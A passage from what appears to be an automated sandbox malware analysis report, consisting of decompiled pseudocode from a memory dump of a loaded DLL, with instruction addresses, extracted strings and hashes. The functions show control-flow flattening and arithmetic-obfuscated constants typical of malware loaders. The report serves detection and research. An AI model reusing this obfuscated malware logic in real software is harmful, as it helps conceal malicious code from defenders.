					} else {
						_t317 = 0x265fc3c2;
						continue;
					}
					goto L30;
				}
			}

0x10018c2b
0x10018c31
0x10018c3e
0x10018c49
0x10018c51
0x10018c53
0x10018c5a
0x10018c61
0x10018c70
0x10018c73
0x10018c77
0x10018c7f
0x10018c87
0x10018c8f
0x10018c97
0x10018c9f
0x10018ca7
0x10018caf
0x10018cb7
0x10018cbb
0x10018cc3
0x10018ccb
0x10018cd3
0x10018cdb
0x10018ce3
0x10018ceb
0x10018cf3
0x10018cfb
0x10018d03
0x10018d0b
0x10018d13
0x10018d1b
0x10018d23
0x10018d2b
0x10018d33
0x10018d3b
0x10018d3f
0x10018d47
0x10018d4f
0x10018d5a
0x10018d65
0x10018d70
0x10018d7d
0x10018d81
0x10018d89
0x10018d91
0x10018d99
0x10018da1
0x10018da9
0x10018dae
0x10018db6
0x10018dbe
0x10018dc6
0x10018dce
0x10018dd6
0x10018ddb
0x10018de3
0x10018deb
0x10018df3
0x10018dfb
0x10018e08
0x10018e0c
0x10018e14
0x10018e1c
0x10018e21
0x10018e29
0x10018e31
0x10018e39
0x10018e41
0x10018e4c
0x10018e54
0x10018e5f
0x10018e6a
0x10018e74
0x10018e7f
0x10018e87
0x10018e8c
0x10018e94
0x10018e9c
0x10018ea4
0x10018eac
0x10018eb4
0x10018eb9
0x10018ec1
0x10018ec9
0x10018ece
0x10018ed6
0x10018ede
0x10018ee6
0x10018ef1
0x10018ef9
0x10018f04
0x10018f0c
0x10018f11
0x10018f19
0x10018f21
0x10018f29
0x10018f34
0x10018f3c
0x10018f47
0x10018f4f
0x10018f57
0x10018f5f
0x10018f67
0x10018f6f
0x10018f7a
0x10018f7f
0x10018f85
0x10018f8d
0x10018f95
0x10018f9d
0x10018fa2
0x10018faa
0x10018fb2
0x10018fba
0x10018fc2
0x10018fcf
0x10018fd0
0x10018fd7
0x10018fde
0x10018fe2
0x10018fea
0x10018ff2
0x10018ffa
0x10019002
0x1001900a
0x10019012
0x10019017
0x1001901f
0x1001902c
0x10019030
0x10019034
0x1001903c
0x1001904a
0x10019051
0x10019055
0x1001905d
0x10019065
0x1001906d
0x10019075
0x1001907d
0x10019085
0x1001908d
0x1001908d
0x00000000
0x10019092
0x100190a4
0x100192b1
0x100190aa
0x100190ac
0x100191b4
0x100191b9
0x100191bc
0x100191be
0x100191c0
0x100191c2
0x100191c2
0x100191c6
0x00000000
0x00000000
0x100191c8
0x100191e1
0x100191e6
0x100191e9
0x100191eb
0x100191f9
0x100191f9
0x00000000
0x00000000
0x00000000
0x100191fa
0x100191fa
0x00000000
0x100191ed
0x100191ed
0x100191ef
0x100191f1
0x100191f3
0x100191c2
0x100191c6
0x00000000
0x00000000
0x100191c6
0x00000000
0x100191f1
0x100191c2
0x10019201
0x10019201
0x10019203
0x10019226
0x1001922b
0x00000000
0x10019205
0x10019216
0x1001921c
0x1001908d
0x1001908d
0x00000000
0x1001908d
0x1001908d
0x00000000
0x100190b2
0x100190b8
0x10019170
0x10019176
0x1001908d
0x1001908d
0x00000000
0x1001908d
0x100190be
0x100190c4
0x1001915c
0x00000000
0x100190ca
0x100190d0
0x1001910e
0x10019122
0x1001913d
0x10019142
0x10019145
0x1001914e
0x10019152
0x1001908d
0x1001908d
0x00000000
0x1001908d
0x100190d2
0x100190d8
0x1001928c
0x1001928c
0x10019292
0x00000000
0x00000000
0x10019298
0x100190de
0x100190e2
0x100190ed
0x100190ee
0x100190fa
0x100190fc
0x10019109
0x00000000
0x10019109
0x100190d8
0x100190d0
0x100190c4
0x100190b8
0x100190ac
0x100192bc
0x100192bc
0x100192c5
0x00000000
0x100192c5
0x10019232
0x10019269
0x1001926e
0x10019270
0x10019273
0x10019276
0x10019282
0x10019287
0x00000000
0x10019278
0x10019278
0x00000000
0x10019278
0x00000000
0x10019276

Strings

~r, xrefs: 1001903C
NN, xrefs: 10018FFA
<_, xrefs: 10018F29
Y, xrefs: 10018D65
/3, xrefs: 10018E14
%n, xrefs: 10018DB6
x, xrefs: 1001901F
$W^, xrefs: 10018D33
?0, xrefs: 10018F47

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $W^$%n$/3$<_$?0$NN$~r$Y$x
API String ID: 0-2889033865
Opcode ID: eb878c7803cd3c4d91d902610edf408604f5e8a35acdc8b2946c982aa176c46a
Instruction ID: 133d9948fb38be54ae358a907baa94ab5ce44b56ba7cbdf8ebb626582585e65a
Opcode Fuzzy Hash: eb878c7803cd3c4d91d902610edf408604f5e8a35acdc8b2946c982aa176c46a
Instruction Fuzzy Hash: 61F123715083819FD3A9CF65C449A5BBBE1FBC5788F108A1CF5EA86260C7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A821 Relevance: 11.5, Strings: 9, Instructions: 251
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1000A821() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _t237;
				signed int _t241;
				void* _t248;
				void* _t254;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				intOrPtr _t287;
				signed int* _t289;
				void* _t291;

				_t289 =  &_v624;
				_v536 = 0x626641;
				_v532 = 0x129981;
				_t287 = 0;
				_v528 = 0;
				_t254 = 0x2e28b741;
				_v524 = 0;
				_v624 = 0x9755;
				_v624 = _v624 + 0xffff0ffe;
				_v624 = _v624 ^ 0x28143b3a;
				_v624 = _v624 + 0xffff9fa9;
				_v624 = _v624 ^ 0xd7eb3c0e;
				_v616 = 0x61ff;
				_v616 = _v616 + 0xfffff5a9;
				_v616 = _v616 ^ 0x00005781;
				_v540 = 0x95c8;
				_v540 = _v540 << 7;
				_v540 = _v540 ^ 0x004af40b;
				_v600 = 0xc6a5;
				_v600 = _v600 + 0xaa28;
				_v600 = _v600 + 0xffff351e;
				_v600 = _v600 ^ 0x0000ff25;
				_v552 = 0xb452;
				_t280 = 7;
				_v552 = _v552 * 0x64;
				_v552 = _v552 ^ 0x0046227b;
				_v576 = 0xc6c;
				_v576 = _v576 / _t280;
				_v576 = _v576 + 0xffff179a;
				_v576 = _v576 ^ 0xffff33c6;
				_v544 = 0xf54b;
				_v544 = _v544 ^ 0xb6fccf77;
				_v544 = _v544 ^ 0xb6fc572e;
				_v560 = 0xea94;
				_v560 = _v560 ^ 0x74db7c03;
				_v560 = _v560 ^ 0x74dbf042;
				_v572 = 0x748e;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 | 0x7bc5136c;
				_v572 = _v572 ^ 0x7bc5304b;
				_v612 = 0xe3c8;
				_v612 = _v612 >> 0xa;
				_v612 = _v612 << 4;
				_t281 = 0x18;
				_v612 = _v612 / _t281;
				_v612 = _v612 ^ 0x0000698f;
				_v568 = 0x502b;
				_v568 = _v568 | 0xfd850b4b;
				_v568 = _v568 ^ 0xfd8572e2;
				_v584 = 0x41d1;
				_t282 = 0x50;
				_v584 = _v584 / _t282;
				_v584 = _v584 << 6;
				_v584 = _v584 ^ 0x000070a2;
				_v588 = 0x111;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x000020f0;
				_v608 = 0xeb8a;
				_v608 = _v608 << 9;
				_v608 = _v608 << 7;
				_v608 = _v608 * 0x63;
				_v608 = _v608 ^ 0x165e3696;
				_v548 = 0x5039;
				_v548 = _v548 << 5;
				_v548 = _v548 ^ 0x000a43df;
				_v596 = 0x4562;
				_v596 = _v596 + 0x2a80;
				_t283 = 0x26;
				_v596 = _v596 * 0x30;
				_v596 = _v596 ^ 0x00148087;
				_v624 = 0x923e;
				_v624 = _v624 / _t283;
				_t284 = 0x7c;
				_v624 = _v624 / _t284;
				_v624 = _v624 ^ 0x19d80190;
				_v624 = _v624 ^ 0x19d83119;
				_v564 = 0xf45b;
				_v564 = _v564 << 0xd;
				_v564 = _v564 ^ 0x1e8b638e;
				_v616 = 0xdafb;
				_v616 = _v616 | 0xdd6b0501;
				_v616 = _v616 ^ 0xdd6b820b;
				_v580 = 0xc4fe;
				_t285 = 0x6c;
				_v580 = _v580 * 0x2e;
				_v580 = _v580 << 3;
				_v580 = _v580 ^ 0x011b5ac6;
				_v556 = 0xca0a;
				_v556 = _v556 + 0xe013;
				_v556 = _v556 ^ 0x00019dbb;
				_v604 = 0x6c6f;
				_v604 = _v604 >> 0x10;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x00007655;
				_v592 = 0xed8d;
				_v592 = _v592 + 0x2fd9;
				_t286 = _v616;
				_v592 = _v592 / _t285;
				_v592 = _v592 ^ 0x000f029b;
				while(1) {
					_t291 = _t254 - 0x2e28b741;
					if(_t291 > 0) {
						goto L16;
					}
					L2:
					if(_t291 == 0) {
						_push(_t254);
						_t241 = E100054FB(0x45c);
						 *0x10021088 = _t241;
						__eflags = _t241;
						if(_t241 == 0) {
							L23:
							return _t287;
						}
						 *((intOrPtr*)(_t241 + 0x10)) = E10012C05;
						_t254 = 0x1b0f9495;
						continue;
						do {
							while(1) {
								_t291 = _t254 - 0x2e28b741;
								if(_t291 > 0) {
									goto L16;
								}
								goto L2;
							}
							goto L16;
							L22:
							__eflags = _t254 - 0x2142cdf5;
						} while (_t254 != 0x2142cdf5);
						goto L23;
					}
					if(_t254 == 0x1f0026e) {
						_v620 = 0xbbec;
						_t254 = 0x21dfc09c;
						_v620 = _v620 >> 0x10;
						_v620 = _v620 ^ 0x00000029;
						continue;
					}
					if(_t254 == 0x1b0f9495) {
						_t286 = E1001340E(_v552, _v576, _t254, _t254, _v592);
						_t289 =  &(_t289[3]);
						__eflags = _t286;
						if(_t286 == 0) {
							_t254 = 0x3b91f90e;
						} else {
							 *((intOrPtr*)( *0x10021088 + 0x244)) = 1;
							_t254 = 0x1f0026e;
						}
						continue;
					}
					if(_t254 == 0x21dfc09c) {
						E10005AB8(_v544, _v560, _v572, _v612, _t286);
						_t289 =  &(_t289[3]);
						L9:
						_t254 = 0x28cf3aa7;
						continue;
					}
					if(_t254 != 0x28cf3aa7) {
						goto L22;
					}
					_push(_t254);
					E1000471A(_v620,  *0x10021088 + 0x254, _v568, _v584, _v588, _v608, _v548);
					_t289 =  &(_t289[8]);
					_t254 = 0x36e34156;
					_t248 = 1;
					_t287 =  ==  ? _t248 : _t287;
					continue;
					L16:
					__eflags = _t254 - 0x36cafd3f;
					if(__eflags == 0) {
						_push(_t254);
						E1000DFD8(_v596,  &_v520, __eflags, _v624, _v564);
						_t237 = E1000165C( &_v520, _v616, _v580, _v556, _v604);
						_t289 =  &(_t289[6]);
						 *((intOrPtr*)( *0x10021088)) = _t237;
						_t254 = 0x2142cdf5;
						goto L22;
					}
					__eflags = _t254 - 0x36e34156;
					if(_t254 == 0x36e34156) {
						E10011F88();
						_t254 = 0x36cafd3f;
						continue;
					}
					__eflags = _t254 - 0x3b91f90e;
					if(_t254 != 0x3b91f90e) {
						goto L22;
					}
					_v620 = 0xad6;
					_v620 = _v620 * 0x11;
					_v620 = _v620 * 0x50;
					_v620 = _v620 | 0x0e445f63;
					_v620 = _v620 ^ 0x0e7ddfff;
					 *((intOrPtr*)( *0x10021088 + 0x14)) = E10015153;
					goto L9;
				}
			}

0x1000a821
0x1000a82b
0x1000a835
0x1000a83d
0x1000a844
0x1000a848
0x1000a84a
0x1000a84e
0x1000a856
0x1000a85e
0x1000a866
0x1000a86e
0x1000a876
0x1000a87e
0x1000a886
0x1000a88e
0x1000a896
0x1000a89b
0x1000a8a3
0x1000a8ab
0x1000a8b3
0x1000a8bb
0x1000a8c3
0x1000a8d2
0x1000a8d5
0x1000a8d9
0x1000a8e1
0x1000a8f1
0x1000a8f5
0x1000a8fd
0x1000a905
0x1000a90d
0x1000a915
0x1000a91d
0x1000a925
0x1000a92d
0x1000a935
0x1000a93d
0x1000a942
0x1000a94a
0x1000a952
0x1000a95a
0x1000a95f
0x1000a968
0x1000a96d
0x1000a973
0x1000a97b
0x1000a983
0x1000a98b
0x1000a993
0x1000a99f
0x1000a9a2
0x1000a9a6
0x1000a9ab
0x1000a9b3
0x1000a9bb
0x1000a9c0
0x1000a9c5
0x1000a9cd
0x1000a9d5
0x1000a9da
0x1000a9e4
0x1000a9e8
0x1000a9f0
0x1000a9fa
0x1000aa04
0x1000aa0c
0x1000aa14
0x1000aa23
0x1000aa26
0x1000aa2a
0x1000aa32
0x1000aa42
0x1000aa4a
0x1000aa4f
0x1000aa55
0x1000aa5d
0x1000aa65
0x1000aa6d
0x1000aa72
0x1000aa7a
0x1000aa82
0x1000aa8a
0x1000aa92
0x1000aa9f
0x1000aaa0
0x1000aaa4
0x1000aaa9
0x1000aab1
0x1000aab9
0x1000aac1
0x1000aac9
0x1000aad1
0x1000aad6
0x1000aadb
0x1000aae3
0x1000aaeb
0x1000aaf9
0x1000aafd
0x1000ab01
0x1000ab09
0x1000ab09
0x1000ab0b
0x00000000
0x00000000
0x1000ab11
0x1000ab11
0x1000abfd
0x1000abfe
0x1000ac03
0x1000ac09
0x1000ac0b
0x1000acda
0x1000ace5
0x1000ace5
0x1000ac11
0x1000ac18
0x1000ac1d
0x1000ab09
0x1000ab09
0x1000ab09
0x1000ab0b
0x00000000
0x00000000
0x00000000
0x1000ab0b
0x00000000
0x1000accd
0x1000accd
0x1000accd
0x00000000
0x1000ab09
0x1000ab1d
0x1000abd4
0x1000abdc
0x1000abe1
0x1000abe6
0x00000000
0x1000abe6
0x1000ab29
0x1000aba9
0x1000abab
0x1000abae
0x1000abb0
0x1000abca
0x1000abb2
0x1000abba
0x1000abc0
0x1000abc0
0x00000000
0x1000abb0
0x1000ab31
0x1000ab87
0x1000ab8c
0x1000ab8f
0x1000ab8f
0x00000000
0x1000ab8f
0x1000ab35
0x00000000
0x00000000
0x1000ab3b
0x1000ab5f
0x1000ab64
0x1000ab67
0x1000ab70
0x1000ab71
0x00000000
0x1000ac22
0x1000ac22
0x1000ac28
0x1000ac88
0x1000ac9c
0x1000acb8
0x1000acc3
0x1000acc6
0x1000acc8
0x00000000
0x1000acc8
0x1000ac2a
0x1000ac30
0x1000ac79
0x1000ac7e
0x00000000
0x1000ac7e
0x1000ac32
0x1000ac38
0x00000000
0x00000000
0x1000ac3e
0x1000ac4b
0x1000ac54
0x1000ac58
0x1000ac60
0x1000ac6d
0x00000000
0x1000ac6d

Strings

bE, xrefs: 1000AA0C
+P, xrefs: 1000A97B
{"F, xrefs: 1000A8D9
VA6, xrefs: 1000AB67
Afb, xrefs: 1000A82B
VA6, xrefs: 1000AC2A
), xrefs: 1000ABE6
Uv, xrefs: 1000AADB
9P, xrefs: 1000A9F0

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$+P$9P$Afb$Uv$VA6$VA6$bE${"F
API String ID: 0-509329050
Opcode ID: 88978cddb7f1681ce913b6ec899f47abffe15ab26f103b0c33449b28a6eae773
Instruction ID: 99cd77902ceafc4bf876f8517227c6f7bd7f06f69f4ee652c926f715892a114a
Opcode Fuzzy Hash: 88978cddb7f1681ce913b6ec899f47abffe15ab26f103b0c33449b28a6eae773
Instruction Fuzzy Hash: BEC143715083819BE358CF25C98991FBBE2FBC5788F104A1EF196962A1C3B9C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10016BE4 Relevance: 11.5, Strings: 9, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E10016BE4(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				unsigned int _v1580;
				signed int _v1584;
				signed int _v1588;
				unsigned int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t245;
				signed int _t255;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t284;
				void* _t285;
				signed int _t288;
				intOrPtr* _t292;
				signed int* _t293;

				_t293 =  &_v1680;
				_t292 = __edx;
				_t259 = __ecx;
				_v1564 = _v1564 & 0x00000000;
				_v1572 = 0x37b7f6;
				_v1568 = 0x1b2ce7;
				_v1632 = 0xec6c;
				_v1632 = _v1632 | 0x543bf563;
				_v1632 = _v1632 ^ 0x543bfd46;
				_v1636 = 0xa23a;
				_v1636 = _v1636 ^ 0x26fe42ca;
				_v1636 = _v1636 >> 0xa;
				_v1636 = _v1636 ^ 0x0009dc41;
				_v1592 = 0x1eb7;
				_v1592 = _v1592 >> 6;
				_v1592 = _v1592 ^ 0x000051d7;
				_v1668 = 0xa1e9;
				_v1668 = _v1668 | 0x5efbd7df;
				_v1668 = _v1668 ^ 0xd3f751b9;
				_v1668 = _v1668 ^ 0x8d0c9003;
				_v1600 = 0x7d57;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x00001a4f;
				_v1608 = 0xd589;
				_v1608 = _v1608 | 0xf26b7913;
				_v1608 = _v1608 << 1;
				_v1608 = _v1608 ^ 0xe4d78fb5;
				_v1660 = 0xf169;
				_v1660 = _v1660 * 0x1f;
				_t285 = 0x2a877a8b;
				_t261 = 0x5a;
				_v1660 = _v1660 * 7;
				_v1660 = _v1660 << 1;
				_v1660 = _v1660 ^ 0x019971bd;
				_v1676 = 0xe75c;
				_v1676 = _v1676 + 0xc4d1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 + 0xffffa84d;
				_v1676 = _v1676 ^ 0xd6161939;
				_v1672 = 0xb9d6;
				_v1672 = _v1672 | 0xb865191f;
				_v1672 = _v1672 ^ 0x5b4935e3;
				_v1672 = _v1672 << 0xd;
				_v1672 = _v1672 ^ 0x9187b9b3;
				_v1680 = 0xc4d6;
				_v1680 = _v1680 + 0x7c91;
				_v1680 = _v1680 + 0xf8dc;
				_v1680 = _v1680 * 0x27;
				_v1680 = _v1680 ^ 0x0056b694;
				_v1616 = 0xc221;
				_v1616 = _v1616 / _t261;
				_v1616 = _v1616 * 0x3f;
				_v1616 = _v1616 ^ 0x0000fe69;
				_v1652 = 0xbd2c;
				_v1652 = _v1652 ^ 0xe1569e35;
				_v1652 = _v1652 << 0xf;
				_v1652 = _v1652 + 0xffff718d;
				_v1652 = _v1652 ^ 0x118bace2;
				_v1580 = 0x567b;
				_v1580 = _v1580 >> 0x10;
				_v1580 = _v1580 ^ 0x00003991;
				_v1576 = 0x298;
				_v1576 = _v1576 << 7;
				_v1576 = _v1576 ^ 0x000109d6;
				_v1588 = 0xb305;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x00433d2e;
				_v1584 = 0x64b3;
				_v1584 = _v1584 >> 0xd;
				_v1584 = _v1584 ^ 0x000018d8;
				_v1624 = 0xad96;
				_t262 = 0x50;
				_v1624 = _v1624 / _t262;
				_v1624 = _v1624 * 0x13;
				_v1624 = _v1624 ^ 0x00007713;
				_v1664 = 0x908a;
				_v1664 = _v1664 >> 6;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 ^ 0x00007bdf;
				_v1644 = 0x7153;
				_v1644 = _v1644 + 0xffffa87a;
				_v1644 = _v1644 << 0xd;
				_v1644 = _v1644 ^ 0x0339cebf;
				_v1640 = 0x1652;
				_v1640 = _v1640 << 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 ^ 0x00000730;
				_v1612 = 0x36fe;
				_v1612 = _v1612 >> 5;
				_v1612 = _v1612 << 3;
				_v1612 = _v1612 ^ 0x000008d8;
				_v1596 = 0x1208;
				_v1596 = _v1596 >> 6;
				_v1596 = _v1596 ^ 0x00000ad2;
				_v1656 = 0xf95a;
				_v1656 = _v1656 ^ 0x8de5a0e4;
				_v1656 = _v1656 + 0xffff7609;
				_v1656 = _v1656 + 0xc07d;
				_v1656 = _v1656 ^ 0x8de5882f;
				_v1620 = 0xca5e;
				_v1620 = _v1620 | 0x2303d271;
				_v1620 = _v1620 + 0xcb9;
				_v1620 = _v1620 ^ 0x2303c846;
				_v1628 = 0x9429;
				_v1628 = _v1628 >> 7;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 ^ 0x0000014e;
				_v1648 = 0x513a;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 | 0xb7f5bffb;
				_v1648 = _v1648 ^ 0xb7f5b057;
				_v1604 = 0xa39d;
				_v1604 = _v1604 + 0xffffa1e7;
				_v1604 = _v1604 ^ 0x00005123;
				_t284 = _v1604;
				while(_t285 != 0xa9a8994) {
					if(_t285 == 0x1592b590) {
						_push( &_v520);
						_push(0x10001000);
						_t245 = E1001B165(_t259, _t292);
						asm("sbb esi, esi");
						_t288 =  ~_t245 & 0xf51449f8;
						L10:
						_t285 = _t288 + 0x29fbdc3d;
						L8:
						_t262 = 0x50;
						continue;
					}
					if(_t285 == 0x1f102635) {
						_push(_t262);
						E1000471A(_v1632,  &_v1040, _v1668, _v1600, _v1608, _v1660, _v1676);
						_push(0x100010b0);
						_push(_v1652);
						_push(_v1616);
						E1000A4D7(__eflags, _v1576, _v1588, _v1584, _v1624, E10005DFC(_v1672, _v1680, __eflags),  &_v1040,  &_v1560,  &_v520);
						E10010D6D(_v1664, _v1644, _v1640, _t248);
						_push(0);
						_push( &_v1560);
						_push(_v1628);
						_push(_v1620);
						_push(_v1656);
						_push(_v1596);
						_push(0);
						_push(0);
						_t255 = E10006417(_v1612, __eflags);
						_t293 =  &(_t293[0x1d]);
						asm("sbb esi, esi");
						_t288 =  ~_t255 & 0xe09ead57;
						__eflags = _t288;
						goto L10;
					}
					if(_t285 == 0x29fbdc3d) {
						return E1000DE81(_v1648, _t284, _v1604);
					}
					if(_t285 != 0x2a877a8b) {
						L13:
						__eflags = _t285 - 0x1e6f5ee2;
						if(_t285 != 0x1e6f5ee2) {
							continue;
						} else {
							return _t255;
						}
						L16:
						return _t255;
					}
					_push(_t262);
					_t255 = E100054FB(_t262);
					_t284 = _t255;
					if(_t284 != 0) {
						_t285 = 0x1592b590;
						goto L8;
					}
					goto L16;
				}
				 *((intOrPtr*)(_t284 + 0x44)) = _t259;
				_t285 = 0x1e6f5ee2;
				 *_t284 =  *0x10021084;
				 *0x10021084 = _t284;
				goto L13;
			}

0x10016be4
0x10016bee
0x10016bf0
0x10016bf2
0x10016bfa
0x10016c02
0x10016c0d
0x10016c15
0x10016c1d
0x10016c25
0x10016c2d
0x10016c35
0x10016c3a
0x10016c42
0x10016c4a
0x10016c4f
0x10016c57
0x10016c5f
0x10016c67
0x10016c6f
0x10016c77
0x10016c7f
0x10016c84
0x10016c8c
0x10016c94
0x10016c9c
0x10016ca0
0x10016ca8
0x10016cb5
0x10016cc2
0x10016cc7
0x10016cc8
0x10016ccc
0x10016cd0
0x10016cd8
0x10016ce0
0x10016ce8
0x10016ced
0x10016cf5
0x10016cfd
0x10016d05
0x10016d0d
0x10016d15
0x10016d1a
0x10016d22
0x10016d2a
0x10016d32
0x10016d3f
0x10016d43
0x10016d4b
0x10016d59
0x10016d62
0x10016d66
0x10016d6e
0x10016d76
0x10016d7e
0x10016d83
0x10016d8b
0x10016d93
0x10016d9b
0x10016da0
0x10016da8
0x10016db0
0x10016db5
0x10016dbd
0x10016dca
0x10016dce
0x10016dd6
0x10016dde
0x10016de3
0x10016ded
0x10016dfb
0x10016dfe
0x10016e07
0x10016e0b
0x10016e13
0x10016e1b
0x10016e20
0x10016e25
0x10016e2a
0x10016e32
0x10016e3a
0x10016e42
0x10016e47
0x10016e4f
0x10016e57
0x10016e5c
0x10016e61
0x10016e69
0x10016e71
0x10016e76
0x10016e7b
0x10016e83
0x10016e8b
0x10016e90
0x10016e98
0x10016ea0
0x10016ea8
0x10016eb0
0x10016eb8
0x10016ec0
0x10016ec8
0x10016ed0
0x10016ed8
0x10016ee0
0x10016ee8
0x10016eed
0x10016ef2
0x10016efa
0x10016f02
0x10016f07
0x10016f0f
0x10016f17
0x10016f1f
0x10016f27
0x10016f2f
0x10016f33
0x10016f45
0x10017074
0x10017075
0x1001707c
0x10017086
0x10017089
0x10017060
0x10017060
0x10016f8b
0x10016f8d
0x00000000
0x10016f8d
0x10016f51
0x10016f90
0x10016fb1
0x10016fb6
0x10016fbb
0x10016fbf
0x1001700e
0x10017023
0x10017031
0x10017032
0x10017033
0x10017037
0x1001703b
0x1001703f
0x1001704a
0x1001704b
0x1001704c
0x10017051
0x10017058
0x1001705a
0x1001705a
0x00000000
0x1001705a
0x10016f59
0x00000000
0x100170c3
0x10016f65
0x100170a6
0x100170a6
0x100170ac
0x00000000
0x00000000
0x00000000
0x00000000
0x100170ce
0x100170ce
0x100170ce
0x10016f75
0x10016f76
0x10016f7b
0x10016f80
0x10016f86
0x00000000
0x10016f86
0x00000000
0x10016f80
0x10017091
0x10017094
0x1001709e
0x100170a0
0x00000000

Strings

W}, xrefs: 10016C77
#Q, xrefs: 10016F27
{V, xrefs: 10016D93
Sq, xrefs: 10016E32
5I[, xrefs: 10016D0D
l, xrefs: 10016C0D
\, xrefs: 10016CD8
.=C, xrefs: 10016DCE
:Q, xrefs: 10016EFA

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
API String ID: 0-1292055276
Opcode ID: 0e7d1f47b68517472f3b597f950bbec36b1019116222218d73afb4cb807131d7
Instruction ID: 5987e5241dfc62fb7523e437ef02b6b3177d1a3c96998f64e551bf8c94f6b79a
Opcode Fuzzy Hash: 0e7d1f47b68517472f3b597f950bbec36b1019116222218d73afb4cb807131d7
Instruction Fuzzy Hash: E5C112724083809FE365CF25C88994BFBF1FB88748F504A1DF599962A0D3B99948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6D9 Relevance: 10.3, Strings: 8, Instructions: 297
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001C6D9(intOrPtr* __edx, intOrPtr _a4) {
				signed int _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* __ecx;
				void* _t252;
				void* _t281;
				intOrPtr _t284;
				void* _t289;
				void* _t293;
				short _t294;
				signed int _t295;
				signed int _t296;
				void* _t298;
				intOrPtr* _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t357;
				signed int* _t359;
				void* _t361;

				_push(_a4);
				_t340 = __edx;
				_push(__edx);
				_v8 = __edx;
				E10012550(_t252);
				_v12 = _v12 & 0x00000000;
				_t359 =  &(( &_v104)[3]);
				_v36 = 0x3d9b;
				_v36 = _v36 + 0x87e4;
				_t298 = 0xa757dfd;
				_v36 = _v36 ^ 0x00003896;
				_v16 = 0xa1a2;
				_t344 = 0x7e;
				_v16 = _v16 / _t344;
				_v16 = _v16 ^ 0x00005f0b;
				_v20 = 0xd4a;
				_v20 = _v20 ^ 0x823c7950;
				_v20 = _v20 ^ 0x823c4fb0;
				_v80 = 0x8dd3;
				_v80 = _v80 + 0xffff84c4;
				_t345 = 0x3a;
				_v80 = _v80 / _t345;
				_t346 = 0xf;
				_v80 = _v80 / _t346;
				_v80 = _v80 ^ 0x00002598;
				_v84 = 0x28b2;
				_v84 = _v84 ^ 0xae38f700;
				_t347 = 0x16;
				_v84 = _v84 * 0x2b;
